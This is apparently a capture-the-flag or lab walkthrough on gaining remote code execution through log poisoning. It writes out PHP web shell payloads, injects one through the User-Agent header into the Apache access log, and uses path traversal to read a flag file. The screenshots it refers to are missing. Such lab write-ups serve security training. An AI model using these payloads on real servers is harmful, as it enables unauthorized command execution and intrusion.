Log Poisoning

Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd

Step 1 - Get your cookie session:

• Open Inspect Element and copy the cookie value:

• Place on the URL with the following format:

• The cookie values are successfully read

Step 2 - Write a web shell:

• URL encode <?php system($GET["cmd"]);?> and place in the URL to write a web shell:

Step 3 - Get the pwd info:

• Use the web shell with the pwd command:

Try to use a different technique to gain RCE and read the flag at /

Step 1 - Try to read the access.log file:

• Place /var/log/apache2/access.log on the URL

• Intercept it with Burp Suite

• Change the User Agent to a string, to see if its reflected on the log file

• Change the User-Agent to <?php system($_GET['cmd']); ?> (use single quotes) and append the cmd=id

Step 2 - Get the flag:

• Look for the flag with cat%20../../../c85ee5082f4c723ace6c0796e3a3db09.txt

And flag found!